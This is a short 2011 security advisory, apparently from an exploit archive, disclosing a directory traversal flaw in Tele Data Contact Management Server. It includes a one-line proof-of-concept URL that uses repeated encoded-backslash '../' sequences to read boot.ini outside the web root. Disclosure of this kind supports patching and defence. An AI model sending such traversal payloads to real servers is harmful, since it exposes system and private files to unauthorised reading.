Tele Data Contact Management Server Directory Traversal

2011.06.07

Credit: AutoSec Tools

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

------------------------------------------------------------------------
Software................Tele Data Contact Management Server
Vulnerability...........Directory Traversal
Threat Level............Serious (3/5)
Download................http://teledata.qc.ca/td_cms/
Discovery Date..........6/1/2011
Tested On...............Windows XP SP3 EN
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch <john@autosectools.com>
------------------------------------------------------------------------


--Description--

A directory traversal vulnerability in Tele Data Contact Management
Server can be exploited to read files outside of the web root.


--PoC--

http://localhost/%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../boot.ini

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

Tele Data Contact Management Server Directory Traversal

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Tele Data Contact Management Server Directory Traversal

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.